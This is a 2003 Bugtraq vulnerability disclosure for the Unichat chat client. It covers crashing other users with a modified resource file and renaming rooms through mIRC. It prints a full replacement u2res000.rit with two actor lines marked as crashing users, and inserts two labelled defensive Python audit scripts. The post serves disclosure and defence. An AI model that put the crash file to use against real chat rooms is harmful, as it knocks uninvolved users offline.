Message-ID: <20031102055811.5290.qmail@sf-www1-symnsj.securityfocus.com>
Date: 2 Nov 2003 05:58:11 -0000
From: DarkKnight <mbuzz04@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Unichat Vulnerabilities
Author: DarkKnight
My site: http://www.insecureonline.com
Product: Unichat
Vendor Info.: Did not respond
//Quote// "Come here," said the Spider to the Fly.
Respected (Just a few):
-------------------
http://securityfocus.com
http://eeye.com
http://packetstormsecurity.nl
http://jinxhackwear.com
http://mod-x.com
-------------------
A program called Unichat suffers from many problems. Firstly, let me explain what Unichat basically is. Unichat is an animated chatting program that has many IRC characteristics.
Unichat's main problem is its inability to handle characters (not letters) correctly. If an attacker were to add additional characters to the application, which can be done by modifying u2res000.rit, all the users' applications in whichever chatroom the attacker visits would crash.
Fix for Above: Add more characters to your u2res000.rit to prevent crashing...the more you add, the slower your Unichat may be (especially on the character select screen, which is why you should modify the registry to select the characters).
Remember how I said that Unichat has many IRC characteristics? Well, if someone were to sign on to the Unichat server with mIRC, they would be able to change the topic, or in this case, the room name of any room desired, the exception being rooms with weird alt characters in them. Why is this? All Unichat rooms automatically do not have "Only ops set Topic" set. (Note: To get a list of rooms, use the command "/names"; it won't show up in "/list". Each room is prefixed with "%#" instead of "#".)
Many more vulnerabilities exist, but the ones I listed are the main ones. I'm not sure if you would call being able to change room names a vulnerability because of how you go about doing it, but I listed it anyways.
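For a server operator, the room-name issue comes down to rooms that lack the "Only ops set Topic" channel mode (+t in IRC terms). The following is an added example, not part of the original post: it reads mode replies and lists the rooms that still need +t. It assumes the server answers MODE queries with the standard IRC numeric 324 (RPL_CHANNELMODEIS); the server name, nick and room names are constructed.

```python
# Constructed replies to "MODE <room>" queries. Numeric 324 is the standard
# IRC RPL_CHANNELMODEIS; that the Unichat server sends it is an assumption.
SAMPLE_REPLIES = [
    ":chat.example 324 auditor %#Lobby +n",
    ":chat.example 324 auditor %#Cafe +tn",
    ":chat.example 324 auditor %#Park +lk 20 secret",
    ":chat.example 332 auditor %#Lobby :Welcome",  # topic reply, ignored
]


def enabled_modes(mode_string):
    """Return the set of mode letters switched on in a string like '+tn-s'."""
    enabled, adding = set(), True
    for ch in mode_string:
        if ch == "+":
            adding = True
        elif ch == "-":
            adding = False
        elif adding:
            enabled.add(ch)
    return enabled


def rooms_missing_topic_lock(lines):
    """List rooms whose 324 reply shows no +t ("Only ops set Topic")."""
    missing = []
    for line in lines:
        parts = line.split()
        # Layout: :server 324 <nick> <room> <modes> [mode parameters...]
        if len(parts) < 5 or parts[1] != "324":
            continue
        room, modes = parts[3], parts[4]
        if "t" not in enabled_modes(modes):
            missing.append(room)
    return missing


def remediation(rooms):
    """Build the MODE commands an operator would issue to lock each topic."""
    return [f"MODE {room} +t" for room in rooms]


if __name__ == "__main__":
    for command in remediation(rooms_missing_topic_lock(SAMPLE_REPLIES)):
        print(command)
```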
##########################################
##### Sample Character Drop Code #####
##### Open u2res000.rit with notepad #####
##### Replace code with below #####
##### - DarkKnight #####
##########################################
// Author: DarkKnight
// WebSite: http://www.insecureonline.com
// Comments: This vulnerability is old, many now know of it.
// Vendor: http://www.unichat.com
; "u2res000.rit"
#VERSION=1.00;
#TIL= // TILE
#
#
{
t00|tcity001=(1,7);
t00|tcity002=(1,5);
t00|tcosm001=(3,7);
t00|tgras001=(1,11);
t00|tgras002=(1,5);
t00|tgras003=(1,2);
t00|tgras004=(1,7);
t00|tgras005=(1,6);
t00|tgras006=(2,7);
t00|tmoun001=(2,10);
t00|tmoun002=(1,13):
t00|troom001=(1,12);
t00|troom002=(1,12);
t00|troom003=(1,11);
t00|troom004=(1,6);
t00|troom005=(1,8);
t00|troom006=(1,11);
t00|troom007=(1,9);
t00|twint001=(1,1);
}
#STT=
{
ca00|cadve001=(10,78);
ca00|cadve006=(23,115);
ca00|cbill001=(32,98);
ca00|ccast002=(106,114);
ca00|ccasw001=(22,30);
ca00|ccasw002=(24,31);
ca00|ccasw003=(8,40);
ca00|ccasw004=(8,40);
ca00|ccasw005=(22,30);
ca00|ccasw006=(24,31);
ca00|ccasw007=(8,40);
ca00|ccasw008=(7,40);
ca00|cceme102=(35,58);
ca00|cceme103=(11,66);
ca00|cceme105=(15,75);
ca00|cceme107=(30,80);
ca00|cceme108=(15,75);
ca00|cceme110=(35,58);
ca00|cceme601=(8,28);
ca00|cceme603=(8,19);
ca00|cceme604=(19,23);
ca00|cceme606=(12,16);
ca00|cceme608=(11,15);
ca00|cceme610=(12,14);
ca00|cceme612=(9,27);
ca00|cceme614=(20,21);
ca00|cceme615=(8,20);
ca00|cceme702=(14,17);
ca00|cceme705=(10,32);
ca00|cceme706=(23,23);
ca00|cceme707=(8,23);
ca00|cceme708=(8,22);
ca00|cceme710=(14,17);
ca00|cceme712=(10,32);
ca00|cceme714=(25,25);
ca00|cceme715=(8,22);
ca00|cceme716=(9,22);
ca00|cchan001=(23,76);
ca00|cchan002=(44,14);
ca00|ccrem001=(125,112);
cd00|cdwwa001=(18,59);
cd00|cdwwa002=(31,99);
cd00|cdwwa003=(29,99);
cd00|cdwwa004=(31,99);
cd00|cdwwa005=(31,99);
cd00|cdwwa006=(31,99);
cd00|cdwwa007=(31,99);
cd00|cdwwa008=(31,99);
cd00|cdwwa009=(31,99);
cd00|ceast001=(8,44);
cd00|ceast002=(15,49);
cd00|ceast003=(8,46);
cd00|ceast004=(9,47);
cd00|ceast006=(11,51);
cd00|ceast007=(10,43);
cd00|ceast009=(15,38);
cd00|ceast011=(8,47);
cd00|ceast015=(30,89);
cd00|ceast017=(12,63);
cd00|ceast018=(12,56);
cd00|ceast020=(15,83);
cd00|ceast024=(15,83);
cd00|cfurn001=(48,51);
cd00|cfurn004=(28,70);
cd00|cfurn005=(7,26);
cd00|cfurn006=(10,24);
cd00|cfurn007=(10,24);
cd00|cfurn008=(10,24);
cd00|cfurn012=(32,34);
cd00|cfurn013=(32,34);
cd00|cfurn014=(32,34);
cd00|cfurn015=(28,36);
cd00|cfurn016=(28,36);
cd00|cfurn017=(28,36);
cd00|cfurn018=(13,28);
cd00|cfurn019=(13,28);
cd00|cfurn020=(13,28);
cd00|cfurn021=(13,33);
cd00|cfurn022=(13,33);
cd00|cfurn023=(13,33);
cd00|cfurn024=(13,25);
cd00|cfurn025=(13,25);
cd00|cfurn026=(13,25);
cd00|cfurn027=(31,33);
cd00|cfurn028=(41,39);
cd00|cfurn029=(34,56);
cd00|cfurn030=(16,76);
cd00|cfurn031=(16,76);
cd00|cfurn032=(14,76);
cd00|cfurn033=(14,76);
cd00|cfurn036=(14,75);
cd00|cfurn038=(50,64);
cd00|cfurn039=(37,33);
cd00|cfurn040=(37,33);
cd00|cfurn041=(37,33);
cd00|cfurn042=(20,20);
cd00|cfurn043=(20,20);
cd00|cfurn044=(20,20);
cd00|cfurn045=(16,25);
cd00|cfurn046=(22,31);
cd00|cfurn047=(22,31);
cd00|cfurn048=(22,31);
cd00|cfurn049=(28,58);
cd00|cfurn050=(35,37);
cd00|cfurn051=(21,49);
cd00|cfurn052=(10,36);
cd00|cfurn053=(33,67);
cd00|cfurn054=(10,40);
cd00|cfurn055=(10,40);
cd00|cfurn056=(10,40);
cd00|cfurn057=(10,40);
cd00|cfurn058=(10,40);
cg00|cgras001=(15,17);
cg00|cgras002=(20,19);
cg00|cgras007=(16,26);
cg00|cgras008=(16,23);
cg00|chous002=(60,70);
cg00|chous003=(68,73);
cg00|chous005=(60,70);
cg00|chous006=(68,73);
cg00|chous008=(60,70);
cg00|chous009=(68,73);
cg00|chous010=(62,47);
cg00|chous011=(63,50);
cg00|chous013=(62,47);
cg00|chous014=(63,50);
cg00|chous016=(62,47);
cg00|chous017=(63,50);
cg00|chous020=(61,67);
cg00|chous021=(55,71);
cg00|cnnwa001=(25,103);
cg00|cnnwa002=(13,100);
cg00|cnnwa003=(32,107);
cg00|cnnwa004=(10,96);
cg00|cnnwa005=(30,106);
cg00|cnnwa006=(29,105);
cg00|cnnwa007=(33,105);
cg00|cnnwa008=(12,97);
cg00|cnnwa009=(27,105);
cg00|cnnwa010=(28,106);
cg00|cnnwa011=(28,110);
cg00|cnnwa012=(24,103);
cg00|cnnwa013=(26,112);
cg00|cnnwa014=(12,99);
cg00|cnnwa015=(25,105);
cg00|cnnwa016=(26,104);
cg00|cpark001=(37,53);
cg00|cpark002=(29,19);
cg00|cpark003=(33,22);
cg00|cpark004=(14,29);
cg00|cpark005=(14,30);
cg00|cpark006=(6,25);
cg00|cpark007=(19,24);
cg00|cpark008=(24,20);
cg00|cpark009=(29,42);
cg00|cpark010=(23,42);
cg00|cpark011=(7,15);
cg00|cpark012=(10,20);
cg00|cpark013=(7,70);
cg00|cpark014=(50,63);
cg00|cpark015=(35,78);
cs00|cshad001=(24,0);
cs00|cshad002=(32,0);
cs00|cshad003=(26,0);
cs00|cshad004=(7,0);
cs00|cshad005=(12,0);
cs00|csign001=(7,81);
cs00|csign002=(7,75);
cs00|csign003=(40,84);
cs00|csign004=(41,77);
cs00|cston001=(17,67);
cs00|cston002=(10,50);
cs00|cston003=(6,31);
cs00|cston004=(15,15);
cs00|cston005=(10,10);
cs00|cston006=(14,56);
cs00|cston007=(6,7);
cs00|cston008=(27,51);
cs00|cston009=(37,48);
cs00|cston010=(12,10);
cs00|cston011=(19,12);
cs00|cston012=(8,52);
cs00|cston013=(20,10);
cs00|cston014=(7,36);
cs00|cston015=(10,49);
cs00|cston016=(24,68);
cs00|cston017=(27,64);
cs00|cston018=(31,59);
cs00|cston019=(27,61);
cs00|cston020=(5,6);
cs00|ctran001=(7,50);
cs00|ctran002=(7,52);
cs00|ctran003=(7,52);
cs00|ctran004=(7,48);
cs00|ctran005=(7,50);
cs00|ctran006=(9,50);
cs00|ctran008=(9,49);
cs00|ctran009=(8,47);
cs00|ctran010=(10,48);
cs00|ctran011=(29,24);
cs00|ctran012=(24,21);
cs00|ctran013=(23,19);
cs00|ctran014=(27,24);
cs00|ctran015=(28,24);
cs00|ctran016=(24,21);
cs00|ctran017=(24,21);
cs00|ctran018=(27,25);
cs00|ctran019=(33,26);
cs00|ctran020=(24,25);
cs00|ctran021=(23,26);
cs00|ctran022=(32,28);
cs00|ctran023=(33,27);
cs00|ctran024=(27,25);
cs00|ctran025=(27,25);
cs00|ctran026=(33,27);
cs00|ctree001=(10,10);
cs00|ctree002=(10,11);
cs00|ctree003=(10,10);
cs00|ctree004=(9,11);
cs00|ctree005=(12,17);
cs00|ctree006=(15,21);
cs00|ctree007=(20,28);
cs00|ctree008=(22,64);
cs00|ctree009=(29,83);
cs00|ctree011=(14,46);
cs00|ctree012=(18,58);
cs00|ctree013=(21,66);
cs00|ctree014=(28,87);
cs00|ctree016=(12,37);
cs00|ctree017=(16,48);
cs00|ctree019=(23,69);
cs00|ctree020=(5,21);
cs00|ctree021=(9,33);
cs00|ctree022=(12,50);
cs00|ctree023=(13,58);
cs00|ctree024=(24,65);
cs00|ctree026=(22,68);
cs00|ctree028=(33,87);
cs00|ctree029=(25,70);
cs00|ctree031=(33,87);
cs00|ctree032=(28,71);
cs00|ctree033=(10,11);
cw00|cwall001=(34,99);
cw00|cwall002=(34,99);
cw00|cwall003=(29,100);
cw00|cwall004=(30,98);
cw00|cwall005=(30,98);
cw00|cwall006=(30,98);
cw00|cwall007=(30,98);
cw00|cwall008=(21,95);
cw00|cwall009=(17,58);
cw00|cwall010=(33,91);
cw00|cwall011=(27,58);
cw00|cwall012=(13,66);
cw00|cwall013=(34,91);
cw00|cwall014=(30,60);
cw00|cwall015=(13,66);
cw00|cwall016=(32,91);
cw00|cwall017=(28,58);
cw00|cwall018=(13,66);
cw00|cwall019=(37,90);
cw00|cwall020=(37,62);
cw00|cwall021=(36,90);
cw00|cwall022=(34,59);
cw00|cwall023=(36,91);
cw00|cwall024=(37,59);
cw00|cwall025=(26,121);
cw00|cwall026=(26,121);
cw00|cwall027=(26,121);
cw00|cwall028=(26,121);
cw00|cwall029=(26,121);
cw00|cwall030=(26,121);
cw00|cwall031=(10,115);
cw00|cwall032=(10,115);
cw00|cwint001=(14,66);
cw00|cwint002=(14,18);
cw00|cwint003=(20,18);
cw00|cwint004=(15,39);
cw00|cwint005=(9,13);
cw00|cwint006=(18,23);
cw00|cwint007=(4,3);
cw00|cwint008=(5,5);
cw00|cwint009=(15,39);
cw00|cwint010=(15,60);
cw00|cwint011=(15,60);
cw00|cwint012=(5,8);
cw00|cwint013=(5,7);
cw00|cwint014=(28,0);
cw00|cwint015=(5,3);
cw00|cwash001=(38,27);
cw00|cwash002=(72,32);
cw00|cwash003=(30,0);
cw00|cwash004=(44,48);
}
#ANI=
{
cw00|iadve001=(3,1),(110,0);
ad_tile_02=(1,4),(1,46);
cw00|iadve003=(1,4),(64,32);
cw00|iarro001=(5,1),(5,0);
cw00|ieast001=(7,1),(12,45);
cw00|ifann001=(3,1),(26,92);
cw00|ifann002=(3,1),(36,15);
cw00|ifire001=(3,1),(10,37);
cw00|ifire003=(3,1),(10,30);
cw00|igras001=(2,1),(7,7);
cw00|ircha001=(3,1),(20,36);
cw00|ircha002=(3,1),(20,23);
cw00|ircha005=(3,1),(20,36);
cw00|ircha006=(3,1),(20,23);
cw00|iston001=(3,1),(27,64);
cw00|itile001=(1,4),(32,0);
cw00|itona001=(3,1),(12,32);
cw00|iwate002=(2,1),(16,8);
cw00|iwate003=(2,1),(32,16);
cw00|wroom001=(1,17),(34,8);
cw01|iadve004=(2,1),(1,46);
}
{
a00|aman_001=(11,4),(23,45);
a00|aman_002=(11,4),(23,45);
a00|aman_003=(11,4),(23,45);
a00|aman_004=(11,4),(23,45);
a00|aman_005=(11,4),(23,45);
a00|aman_006=(11,4),(23,45);
a00|aman_007=(11,4),(23,45);
a00|aman_008=(11,4),(23,45);
a00|aman_009=(11,4),(23,45);
a00|aman_010=(11,4),(23,45);
a00|awman001=(11,4),(23,45);
a00|awman002=(11,4),(23,45);
a00|awman003=(11,4),(23,45);
a00|awman004=(11,4),(23,45);
a00|awman005=(11,4),(23,45);
a00|awman006=(11,4),(23,45);
a00|awman007=(11,4),(23,45);
a00|awman008=(11,4),(23,45);
cs00|ctree019=(11,4),(23,45);
}
#WAV=
{
sagry000;
schng000;
schng001;
schng002;
sclos000;
scrys000;
sembr000;
sembr001;
shit_000;
shit_001;
shit_002;
shit_003;
sjpdn000;
sjpdn001;
sjpup000;
sjpup001;
skiss000;
spick000;
ssexy000;
sstep000;
ssurp000;
stemp000;
stemp001;
stemp002;
stemp003;
stran000;
sturn000;
sturn001;
}
#MID=
{
mjazz000; 0
mjazz001; 1
mjazz002; 2
mjazz003; 3
mjazz004; 4
mjazz005; 5
mjazz006; 6
mcvtn000; 7
mdrmo000; 8
mfanf000; 9
mintr000; 10
mintr001; 11
mjopl000; 12
mmidi000; 13
mmidi001; 14
mmore000; 15
mmzrt000; 16
mrach000; 17
msadd000; 18
mstrs000; 19
msusp000; 20
mumch000; 21
mxmas000; 22
}
#STAGE=
{
0000csin;
0001ctrm;
blackroom;
0002ctrm;
0003ctrm;
0004ctrm;
0005ctrm;
preview;
0000casa;
0000casb;
0000cemt;
0000east;
0000haus;
0000park;
0000spac;
0000ston;
0000strt;
0000wash;
0000wint;
0001demo;
0002demo;
0003demo;
0010casa;
0010casb;
0010csin;
0010cemt;
0020casa;
0020casb;
0020cemt;
0020csin;
0020haus;
0020park;
0030casa;
0030casb;
0040casa;
1010csin;
1020csin;
2000csin;
2010csin;
2100csin;
2110csin;
2200csin;
2220csin;
3100csin;
3110csin;
3200csin;
3220csin;
4000csin;
4010csin;
}
#SERVERIP=
{
65.104.9.68;
65.104.9.68;
127.0.0.1;
}
#ACTOR=a00|aman_001,Toto,40;
{
STANDF=1,(0,2,20,10);
STANDB=1,(9,2,20,10);
STANDINGF=1,(|0,2,20,10,schng002)(/0,2)(*0,2)(#0,2)(0,2);
STANDINGB=1,(|9,2,20,10,schng002)(/9,2)(*9,2)(#9,2)(9,2);
MORPHF=1,(39,2,20,10);
MORPHB=1,(42,2,20,10);
MORPHINGF=1,(|39,2,20,10,schng000)(/39,2)(*39,2)(#39,2)(39,2);
MORPHINGB=1,(|42,2,20,10,schng001)(/42,2)(*42,2)(#42,2)(42,2);
DOZEF=0,(*21,10)(*22,10);
DOZEB=0,(*33,10)(*34,10);
WALKF=1,(1,0,8,4,sstep000)
WALKB=1,(5,0,8,4,sstep000)
UPF=1,(1,0)
UPB=1,(5,0)
DOWNF=1,(1,0)
DOWNB=1,(5,0)
MORPHWALKF=1,(40,0,8,4,sturn000)
MORPHWALKB=1,(42,0,8,4,sturn001)
CHAT=3,(10)(11)(12);
ENTER=1,(|0,3,0,0,sstep000)(/0,3)(*0,3)(#0,3)(0,1);
EXIT=1,(0,3,0,0,sstep000)(#0,3)(*0,3)(/0,3)(|0,3);
SMILE=1,(13,5,0,0,stemp000)(14)(13)(14)(13)(14);
MAD=1,(15,5,0,0,sagry000)(16)(15)(16)(15)(16);
HELLO=1,(17,10)(18);
CRY=1,(19,5,0,0,scrys000)(20)(19)(20)(19)(20);
SCRATCH=1,(23,3,0,0,stemp001)(24,2)(23,3)(24,2);
PICK=1,(29,10,0,0,spick000);
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(*32)(32)(31)(32);
WIGGLEB=2,(33)(34);
PUNCHF=3,(25,5,0,0,shit_000)(26);
PUNCHB=3,(37,5,0,0,shit_002)(38);
BEATENF=3,(25,5,0,0,shit_000)(26);;
BEATENB=3,(37,5,0,0,shit_002)(38);
}
#ACTOR=a00|aman_002, BatBoi,40;
{
MORPHWALKF=1,(1,0,8,4,sturn000)
MORPHWALKB=1,(5,0,8,4,sturn001)
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(31)(32);
}
#ACTOR=a00|aman_003, Gull,40;{}
#ACTOR=a00|aman_004, Dino,40;{}
#ACTOR=a00|aman_005, Bongun,40;{}
#ACTOR=a00|aman_006, DarkKnight,40;{}
#ACTOR=a00|aman_007, Board,40;{}
#ACTOR=a00|aman_008, Richard,40;{}
#ACTOR=a00|aman_009, Hook,40;{}
#ACTOR=a00|aman_010, Dalgong,40;{}
#ACTOR=a00|awman001, Cutie,40;{}
#ACTOR=a00|awman002, Dollie,40;{}
#ACTOR=a00|awman003, Foxie,40;{}
#ACTOR=a00|awman004, Sian,40;{}
#ACTOR=a00|awman005, Sharon,40;{}
#ACTOR=a00|awman006, Mingming,40;{}
#ACTOR=a00|awman007, Robo,40;{}
#ACTOR=a00|awman008, Uni,40;{}
#ACTOR=a00|awman008, DarkKnight,40;{} //Crashes users
#ACTOR=a00|awman008, DarkKnight2,40;{} //Crashes users
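The crash described above depends on one client's u2res000.rit defining characters that other clients' copies do not. The following is an added example, not part of the original post: it compares the #ACTOR table of a candidate file against a reference copy and reports added entries and reused sprite resources. Both sample files are constructed from the #ACTOR layout shown above, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed samples in the #ACTOR layout shown in the advisory.
REFERENCE_RIT = """\
#ACTOR=a00|aman_001,Toto,40;
{
STANDF=1,(0,2,20,10);
}
#ACTOR=a00|awman007, Robo,40;{}
#ACTOR=a00|awman008, Uni,40;{}
"""
CANDIDATE_RIT = REFERENCE_RIT + """\
#ACTOR=a00|awman008, DarkKnight,40;{} //Crashes users
#ACTOR=a00|awman008, DarkKnight2,40;{} //Crashes users
"""

# Captures the resource id after '|' and the display name after the comma.
ACTOR_RE = re.compile(r"^#ACTOR=[^|,]+\|([^,]+),\s*([^,]+),\s*\d+\s*;")


def parse_actors(text):
    """Return [(line_no, resource_id, display_name)] for every #ACTOR line."""
    actors = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = ACTOR_RE.match(line.strip())
        if m:
            actors.append((line_no, m.group(1).strip(), m.group(2).strip()))
    return actors


def compare_actor_tables(reference, candidate):
    """Report how a candidate file's character table departs from a reference."""
    ref = {(res, name) for _, res, name in parse_actors(reference)}
    cand = parse_actors(candidate)
    names_by_resource = defaultdict(list)
    for _, res, name in cand:
        names_by_resource[res].append(name)
    return {
        "reference_count": len(ref),
        "candidate_count": len(cand),
        "added": [(no, res, name) for no, res, name in cand if (res, name) not in ref],
        "reused_resources": {r: n for r, n in names_by_resource.items() if len(n) > 1},
    }


if __name__ == "__main__":
    for key, value in compare_actor_tables(REFERENCE_RIT, CANDIDATE_RIT).items():
        print(f"{key}: {value}")
```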